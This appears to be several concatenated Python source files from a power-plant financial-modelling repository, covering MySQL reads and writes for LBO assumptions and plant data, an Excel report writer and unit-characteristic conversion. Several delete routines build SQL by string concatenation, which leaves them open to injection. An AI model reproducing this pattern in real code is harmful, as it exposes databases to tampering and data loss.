connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
delete_sql_statment = """
DELETE FROM financials_lbo
where
portfolio = '""" + portfolio + """'
and
scenario = '""" + scenario + """'
and
version = '""" + version + """';
"""
cursor = connection_instance.cursor()
cursor.execute(delete_sql_statment)
connection_instance.commit()
connection_instance.close()
engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
engine = create_engine(engine_str, encoding='latin1', echo=True)
# prices_df.to_sql(name='prices', con=engine, if_exists='append', index=False)
step = 3000
current_index = 0
while current_index + step < len(ready_to_kean_lbo_financials_df):
ready_to_kean_lbo_financials_df.iloc[current_index:current_index+step].to_sql(name='financials_lbo', con=engine, if_exists='append', index=False)
current_index += step
ready_to_kean_lbo_financials_df.iloc[current_index:].to_sql(name='financials_lbo', con=engine, if_exists='append', index=False)
def get_financials_lbo(portfolio, scenario, version):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM financials_lbo
where
portfolio = %s
and
scenario = %s
and
version = %s;
"""
lbo_financials_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, scenario, version])
connection_instance.close()
return lbo_financials_df
def put_powerplants(ready_to_kean_pp_df, portfolio=None, overwrite_option=False):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
if portfolio is not None and overwrite_option:
print ("============================== herer?")
sql_statement = " delete from powerplant where name in (select distinct entity_name from portfolio where name = %s and entity_type = 'plant');"
print (sql_statement, portfolio)
cursor = connection_instance.cursor()
cursor.execute(sql_statement, params=[portfolio])
connection_instance.commit()
connection_instance.close()
engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
engine = create_engine(engine_str, encoding='latin1', echo=True)
ready_to_kean_pp_df.to_sql(name='powerplant', con=engine, if_exists='append', index=False)
def put_powerplant(ready_to_kean_pp_df, id_powerplant=[]):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
engine = create_engine(engine_str, encoding='latin1', echo=True)
if id_powerplant != [] and id_powerplant is not None:
sql_statement = """
delete from powerplant where id_powerplant in (""" + ", ".join(id_powerplant) + """ );
"""
cursor = connection_instance.cursor()
cursor.execute(sql_statement)
connection_instance.commit()
connection_instance.close()
ready_to_kean_pp_df.to_sql(name='powerplant', con=engine, if_exists='append', index=False)
def put_technology(ready_to_kean_tech_df):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
delete_sql_statment = """
DELETE FROM technology;
"""
cursor = connection_instance.cursor()
cursor.execute(delete_sql_statment)
connection_instance.commit()
connection_instance.close()
engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
engine = create_engine(engine_str, encoding='latin1', echo=True)
ready_to_kean_tech_df.to_sql(name='technology', con=engine, if_exists='append', index=False)
def get_powerplants(effective_date=datetime.now().date()):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM powerplant WHERE effective_start <= %s and effective_end >= %s;
"""
powerplants_df = pd.read_sql(sql_statement, connection_instance, params=[effective_date, effective_date])
connection_instance.close()
return powerplants_df
def get_powerplants_by_portfolio(portfolio, effective_date=datetime.now().date()):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM powerplant WHERE effective_start <= %s and effective_end >= %s and name in (select distinct entity_name from portfolio where name = %s and entity_type='plant');
"""
powerplants_df = pd.read_sql(sql_statement, connection_instance, params=[effective_date, effective_date, portfolio])
connection_instance.close()
return powerplants_df
def get_powerplant(name, fuel_type, market, node, power_hub, effective_date=datetime.now().date()):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM powerplant
where name = %s
and
fuel_type = %s
and
market = %s
and
node = %s
and
power_hub = %s
and
effective_start <= %s
and
effective_end >= %s
;
"""
powerplant_df = pd.read_sql(sql_statement, connection_instance, params=[name, fuel_type, market, node, power_hub, effective_date, effective_date])
connection_instance.close()
return powerplant_df
def get_technology(project):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM technology where project = %s;
"""
technology_df = pd.read_sql(sql_statement, connection_instance, params=[project])
connection_instance.close()
return technology_df
def get_portfolio_with_powerplant(portfolio_name):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """ select
a.name as portfolio_name,
a.entity_name as powerplant_name,
b.technology as technology_name,
b.fuel_type as fuel_type,
b.market as market,
b.power_hub as power_hub,
b.power_zone as power_zone,
b.power_hub_on_peak as power_hub_on_peak,
b.power_hub_off_peak as power_hub_off_peak,
b.node as node,
b.fuel_zone as fuel_zone,
b.fuel_hub as fuel_hub,
b.summer_fuel_basis as summer_fuel_basis,
b.winter_fuel_basis as winter_fuel_basis,
b.summer_duct_capacity as summer_duct_capacity,
b.summer_base_capacity as summer_base_capacity,
b.winter_duct_capacity as winter_duct_capacity,
b.winter_base_capacity as winter_base_capacity,
b.first_plan_outage_start as first_plan_outage_start,
b.first_plan_outage_end as first_plan_outage_end,
b.second_plan_outage_start as second_plan_outage_start,
b.second_plan_outage_end as second_plan_outage_end,
b.carbon_cost as carbon_cost,
b.source_notes as source_notes,
b.retirement_date as retirement_date,
b.ownership as ownership
from
(select * from portfolio where name = %s and entity_type='plant' ) as a
left join
(select * from powerplant ) as b
on a.entity_name = b.name
where b.effective_start <= CURDATE() and b.effective_end >= CURDATE(); """
portfolio_with_powerplant_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio_name])
connection_instance.close()
return portfolio_with_powerplant_df
def put_lbo_assumptions(ready_to_kean_lbo_assumptions_df, portfolio, scenario, version, overwrite_option=False):
if overwrite_option:
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
delete_sql_statment = """
DELETE FROM lbo_assumptions
where
portfolio = '""" + portfolio + """'
and
scenario = '""" + scenario + """'
and
version = '""" + version + """';
"""
cursor = connection_instance.cursor()
cursor.execute(delete_sql_statment)
connection_instance.commit()
connection_instance.close()
engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
engine = create_engine(engine_str, encoding='latin1', echo=True)
index = 0
step = 3000
while index+step < len(ready_to_kean_lbo_assumptions_df):
ready_to_kean_lbo_assumptions_df.iloc[index:index+step].to_sql(name='lbo_assumptions', con=engine, if_exists='append', index=False)
index += step
ready_to_kean_lbo_assumptions_df.iloc[index:].to_sql(name='lbo_assumptions', con=engine, if_exists='append', index=False)
def get_lbo_assumptions(portfolio, scenario, version):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statement = """
SELECT * FROM lbo_assumptions
where
portfolio = %s
and
scenario = %s
and
version = %s;
"""
lbo_assumptions_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio, scenario, version])
connection_instance.close()
return lbo_assumptions_df
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,748 | changliukean/KEAN3 | refs/heads/master | /database/dbPCUC.py | import mysql.connector
from database.dbGeneral import HOST,USER,PASSWORD,PROD_DATABASE,config_connection
from sqlalchemy import create_engine
import pandas as pd
from datetime import datetime
def put_characteristics(ready_to_kean_pcuc_df, scenario, version):
connection_instance = config_connection(HOST, USER, PASSWORD, PROD_DATABASE)
delete_sql_statment = """
DELETE FROM plant_characteristics
where
scenario = '""" + scenario + """'
and
version = '""" + version + """';
"""
cursor = connection_instance.cursor()
cursor.execute(delete_sql_statment)
connection_instance.commit()
connection_instance.close()
engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + PROD_DATABASE
engine = create_engine(engine_str, encoding='latin1', echo=True)
step = 3000
current_index = 0
while current_index + step < len(ready_to_kean_pcuc_df):
ready_to_kean_pcuc_df.iloc[current_index:current_index+step].to_sql(name='plant_characteristics', con=engine, if_exists='append', index=False)
current_index += step
ready_to_kean_pcuc_df.iloc[current_index:].to_sql(name='plant_characteristics', con=engine, if_exists='append', index=False)
version_log_df = pd.DataFrame(columns=['timestamp','user','table_name','scenario','version','description', 'number_of_records_inserted'], data=[[datetime.now(),'chang.liu@kindle-energy.com','plant_characteristics',scenario,version,'loaded from script as of ' + str(datetime.now()), len(ready_to_kean_pcuc_df)]])
version_log_df.to_sql(name='version_log', con=engine, if_exists='append', index=False)
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,749 | changliukean/KEAN3 | refs/heads/master | /financial/FSLI.py |
class FSLI:
def __init__(self, name, date_start, date_end, amount=0, credit_sign=1, is_subtotal=False):
self.name = name
self.dateStart = date_start
self.dateEnd = date_end
self.amount = amount
self.creditSign = credit_sign
self.isSubtotal = is_subtotal
def __str__(self):
console_text = ''
console_text += ("---------------------------")
console_text += ("FSLI object:\n")
console_text += ("Name:" + self.name + "\n")
console_text += ("Date Start:" + str(self.dateStart) + "\n")
console_text += ("Date End: " + str(self.dateEnd) + "\n")
console_text += ("Amount: " + str(self.amount) + "\n")
console_text += ("Credit Sign: " + str(self.creditSign) + "\n")
console_text += ("Is Subtotal: " + str(self.isSubtotal) + "\n")
return console_text
def calc_subtotal(self, fslis):
if self.isSubtotal:
self.amount = sum([fsli_obj.amount * fsli_obj.creditSign for fsli_obj in fslis])
else:
print ("FSLI", self.name, " is not a subtotal FSLI.")
return None
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,750 | changliukean/KEAN3 | refs/heads/master | /reportwriter/ReportWriter.py | import pyexcelerate
import sys
class ReportWriter:
def __init__(self,
workbook,
data,
formats):
# the workbook that to be write on
self.workbook = self.__initialize_workbook(workbook)
# a dictionary of data matrices containing pure data to be written
self.data = data
# a dictionary of lists of formats to be applied to different worksheet
self.formats = formats
def __initialize_workbook(self, workbook):
if isinstance(workbook, str):
return pyexcelerate.Workbook(workbook)
if isinstance(workbook, pyexcelerate.Workbook):
return workbook
def get_lower_right_based_on_data(self, data_rows, range_upper_left):
max_row = len(data_rows)
max_row = int(''.join([char for char in range_upper_left if char.isdigit()])) + max_row - 1
max_column = len(data_rows[0])
max_column = self.get_col2num(''.join([char for char in range_upper_left if not char.isdigit()])) + max_column - 1
max_column_letter = ReportWriter.get_num2col(max_column)
return max_column_letter + str(max_row)
def create_worksheet(self, sheet_name):
return self.workbook.new_sheet(sheet_name)
def write_data_to_workbook(self):
for key in self.data.keys():
worksheet = self.workbook.new_sheet(key)
data_rows = self.data[key]
range_upper_left = 'A1'
if key in self.formats:
if 'RangeUpperLeft' in self.formats[key]:
range_upper_left = self.formats[key]['RangeUpperLeft']
range_lower_right = self.get_lower_right_based_on_data(data_rows, range_upper_left)
self.write_data_to_worksheet(worksheet, data_rows, range_upper_left, range_lower_right)
def write_format_to_workbook(worksheet, format):
pass
def write_data_to_worksheet(self, worksheet, data_rows, range_upper_left, range_lower_right):
print (range_upper_left)
print (range_lower_right)
worksheet.range(range_upper_left, range_lower_right).value = data_rows
def save(self, filepath):
self.workbook.save(filepath)
@staticmethod
def get_num2col(column_number):
string = ""
while column_number > 0:
column_number, remainder = divmod(column_number - 1, 26)
string = chr(65 + remainder) + string
return string
@staticmethod
def get_col2num(column_letter):
num = 0
for c in column_letter:
num = num * 26 + (ord(c.upper()) - ord('A')) + 1
return num
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,751 | changliukean/KEAN3 | refs/heads/master | /liquidity_oob_test.py | from liquidity.Liquidity import OID, DFC, Liquidity, Debt, OperatingCompany
from datetime import date
import importlib
from reportwriter.ReportWriter import ReportWriter
from scipy.optimize import fsolve
import sys
def lightstone_test():
# balance = 1725000000
# begin_date = date(2017,2,1)
# end_date = date(2024,1,31)
# oid_discount = 98
#
# monthly_oid_payments = OID.calc_monthly_oid_payments(balance, begin_date, end_date, oid_discount)
#
# print (monthly_oid_payments)
#
#
# balance = 300000000
# begin_date = date(2018,9,1)
# end_date = date(2024,1,31)
# oid_discount = 99.5
#
# monthly_oid_payments = OID.calc_monthly_oid_payments(balance, begin_date, end_date, oid_discount)
#
# print (monthly_oid_payments)
#
# balance = 1725000000
# begin_date = date(2017,2,1)
# end_date = date(2024,1,31)
# oid_discount = 98
# initial_oid = OID(balance, begin_date, end_date, oid_discount)
# monthly_oid_payments = initial_oid.build_monthly_oid_payments()
#
# print (monthly_oid_payments)
#
# balance = 300000000
# begin_date = date(2018,9,1)
# end_date = date(2024,1,31)
# oid_discount = 99.5
# upsize_oid = OID(balance, begin_date, end_date, oid_discount)
# monthly_oid_payments = upsize_oid.build_monthly_oid_payments()
# print (monthly_oid_payments)
# balance = 1725000000
# begin_date = date(2017,1,17)
# end_date = date(2024,1,31)
# dfc_rate = 0.04
# initial_dfc = DFC(balance, begin_date, end_date, dfc_rate)
# dfc_payments = initial_dfc.build_monthly_dfc_payments()
#
# print (dfc_payments)
#
portfolio = 'Lightstone'
liquidity_scenario = '2020 Mar AMR Liquidity Test'
liquidity_version = 'v1'
lightstone_liquidity = Liquidity(portfolio,liquidity_scenario,liquidity_version)
# print (len(lightstone_liquidity.capitalStructure))
# for item in lightstone_liquidity.capitalStructure:
# print ("==================================================")
# if isinstance(item, Debt):
# print (item.instrumentID)
# print (" --------------------- debt upsizes: ------------------- ")
# print (item.upsizes)
# print (" --------------------- debt prepays: ------------------- ")
# print (item.prepays)
# if isinstance(item, OperatingCompany):
# print (" --------------------- Operating Company: ------------------- ")
# print (item.portfolio)
# print (item.financialsScenario)
# print (item.financialsVersion)
# print (item.financialsTable)
""" preset everything we need for running liquidity waterfall """
lightstone_liquidity.set_cashflow_with_waterfall()
""" build key components for liquidity """
lightstone_liquidity.analyze_liquidity()
financials_df = lightstone_liquidity.get_financials()
annual_cashflow_datarows, monthly_cashflow_datarows = lightstone_liquidity.output_liquidity_results()
# financials_df.to_csv("lightstone_financials_df.csv")
""" Step 4, calling reportwrite to write the designed reports """
wb = 'myfirstkean3report.xlsx'
filepath = 'myfirstkean3report.xlsx'
data = {'Annual Summary':annual_cashflow_datarows, 'Monthly Summary': monthly_cashflow_datarows}
formats = {}
test_rw = ReportWriter(wb, data, formats)
test_rw.write_data_to_workbook()
test_rw.save(filepath)
if __name__ == '__main__':
""" 20200527 test cases using vistra financials """
portfolio = 'Vector'
liquidity_scenario = 'LBO model test'
liquidity_version = 'v1'
vector_lbo = Liquidity(portfolio,liquidity_scenario,liquidity_version)
""" preset everything we need for running liquidity waterfall """
vector_lbo.set_cashflow_with_waterfall()
""" build key component for lbo """
vector_lbo.analyze_leverage_buyout()
cashflow_df = vector_lbo.metadata['cashflow']
# cashflow_df.to_csv("cashflow_df_1.csv")
vector_lbo.solve_purchase_price_by_irr(0.2)
cashflow_df = vector_lbo.metadata['cashflow']
""" next step to use ReportWriter to write the formatted report """
sys.exit()
#
# """ build key components for liquidity """
# lightstone_liquidity.analyze_liquidity()
#
# financials_df = lightstone_liquidity.get_financials()
#
# annual_cashflow_datarows, monthly_cashflow_datarows = lightstone_liquidity.output_liquidity_results()
#
# # financials_df.to_csv("lightstone_financials_df.csv")
#
#
# """ Step 4, calling reportwrite to write the designed reports """
# wb = 'myfirstkean3report.xlsx'
# filepath = 'myfirstkean3report.xlsx'
# data = {'Annual Summary':annual_cashflow_datarows, 'Monthly Summary': monthly_cashflow_datarows}
# formats = {}
# test_rw = ReportWriter(wb, data, formats)
# test_rw.write_data_to_workbook()
# test_rw.save(filepath)
#
#
#
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,752 | changliukean/KEAN3 | refs/heads/master | /utility/dispatchUtils.py | import pandas as pd
import numpy as np
from utility.dateUtils import get_month_list
from database.dbPrices import get_historical_lmp
from dateutil.relativedelta import relativedelta
from datetime import date, datetime
import sys
def get_hr(row, heatrate_summer, heatrate_winter):
period = row['period']
if period.month < 5 or period.month > 9:
return heatrate_winter / 1000.0
else:
return heatrate_summer / 1000.0
def get_load(row, load_summer, load_winter):
period = row['period']
if period.month < 5 or period.month > 9:
return load_winter
else:
return load_summer
def get_outage_days(row, outage_start_date, outage_end_date):
period = row['period']
period_start = date(period.year, period.month, 1)
if pd.isnull(outage_start_date) or pd.isnull(outage_end_date):
return 0
outage_start_date = date(period.year, outage_start_date.month, outage_start_date.day)
outage_end_date = date(period.year, outage_end_date.month, outage_end_date.day)
if outage_start_date > period or outage_end_date < period_start:
return 0
if outage_start_date <= period_start and outage_end_date >= period:
return period.day
if outage_start_date <= period_start and outage_end_date < period:
return relativedelta(outage_end_date, outage_start_date).days + 1
if outage_start_date > period_start and outage_end_date >= period:
return relativedelta(period, outage_start_date).days + 1
def get_escalated_value(value, escalation, period):
return value * (1 + escalation) ** (period.year - 2020)
def convert_uc(plant_tech_master_file, scenario, version, start_date, end_date, escalation=0.02):
simple_uc_df = pd.read_excel(plant_tech_master_file, sheet_name='Simple UC')
tech_df = pd.read_excel(plant_tech_master_file, sheet_name='Tech')
month_list = get_month_list(start_date, end_date)
# for month in month_list:
# print (month)
merged_simple_uc_df = pd.merge(simple_uc_df, tech_df, on='Tech', how="left")
# merged_simple_uc_df.to_csv("merged_simple_uc_df.csv")
ready_to_kean_pcuc_df = pd.DataFrame()
for index, row in merged_simple_uc_df.iterrows():
plant_name = row['Plant']
total_plant_temp_df = pd.DataFrame()
temp_ready_to_kean_df = pd.DataFrame(data=month_list, columns=['period'])
""" emissions """
emissions = row['Carbon Cost ($/Ton)'] * row['Emissions Rate (lb/MMBtu)'] / 2000.0
emissions_temp_ready_to_kean_df = temp_ready_to_kean_df
emissions_temp_ready_to_kean_df['characteristic'] = 'emissions'
emissions_temp_ready_to_kean_df['value'] = emissions_temp_ready_to_kean_df.apply(lambda row: get_escalated_value(emissions, escalation, row['period']), axis=1)
emissions_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(emissions_temp_ready_to_kean_df)
""" forced_outage_value """
forced_outage_value = row['UOF']
fov_temp_ready_to_kean_df = temp_ready_to_kean_df
fov_temp_ready_to_kean_df['characteristic'] = 'forced_outage_value'
fov_temp_ready_to_kean_df['value'] = forced_outage_value
fov_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(fov_temp_ready_to_kean_df)
""" fuel_transport """
fuel_transport = row['Fuel Basis ($/MMBtu)']
ftp_temp_ready_to_kean_df = temp_ready_to_kean_df
ftp_temp_ready_to_kean_df['characteristic'] = 'fuel_transport'
ftp_temp_ready_to_kean_df['value'] = fuel_transport
ftp_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ftp_temp_ready_to_kean_df)
""" fuel_type """
fuel_type = row['Fuel Type']
ft_temp_ready_to_kean_df = temp_ready_to_kean_df
ft_temp_ready_to_kean_df['characteristic'] = 'fuel_type'
ft_temp_ready_to_kean_df['value'] = 0.0
ft_temp_ready_to_kean_df['value_str'] = fuel_type
total_plant_temp_df = total_plant_temp_df.append(ft_temp_ready_to_kean_df)
""" gas_instrument_id """
gas_instrument_id = row['Fuel Hub']
gii_temp_ready_to_kean_df = temp_ready_to_kean_df
gii_temp_ready_to_kean_df['characteristic'] = 'gas_instrument_id'
gii_temp_ready_to_kean_df['value'] = 0.0
gii_temp_ready_to_kean_df['value_str'] = gas_instrument_id
total_plant_temp_df = total_plant_temp_df.append(gii_temp_ready_to_kean_df)
""" heatrate_high_load """
heatrate_high_load_summer = row['Summer Base Heat Rate']
heatrate_high_load_winter = row['Winter Base Heat Rate']
hhl_temp_ready_to_kean_df = temp_ready_to_kean_df
hhl_temp_ready_to_kean_df['value'] = hhl_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_high_load_summer, heatrate_high_load_winter), axis=1)
hhl_temp_ready_to_kean_df['characteristic'] = 'heatrate_high_load'
hhl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hhl_temp_ready_to_kean_df)
""" heatrate_max_load """
heatrate_max_load_summer = row['Summer Duct Heat Rate']
heatrate_max_load_winter = row['Winter Duct Heat Rate']
hml_temp_ready_to_kean_df = temp_ready_to_kean_df
hml_temp_ready_to_kean_df['value'] = hml_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_max_load_summer, heatrate_max_load_winter), axis=1)
hml_temp_ready_to_kean_df['characteristic'] = 'heatrate_max_load'
hml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hml_temp_ready_to_kean_df)
""" heatrate_min_load """
heatrate_min_load_summer = row['Summer Base Heat Rate'] * row['Lower Operating Limit - Summer Heat Rate']
heatrate_min_load_winter = row['Winter Base Heat Rate'] * row['Lower Operating Limit - Winter Heat Rate']
hminl_temp_ready_to_kean_df = temp_ready_to_kean_df
hminl_temp_ready_to_kean_df['value'] = hminl_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_min_load_summer, heatrate_min_load_winter), axis=1)
hminl_temp_ready_to_kean_df['characteristic'] = 'heatrate_min_load'
hminl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hminl_temp_ready_to_kean_df)
""" high_load """
high_load_summer = row['Summer Base Capacity']
high_load_winter = row['Winter Base Capacity']
hl_temp_ready_to_kean_df = temp_ready_to_kean_df
hl_temp_ready_to_kean_df['value'] = hl_temp_ready_to_kean_df.apply(lambda row: get_load(row, high_load_summer, high_load_winter), axis=1)
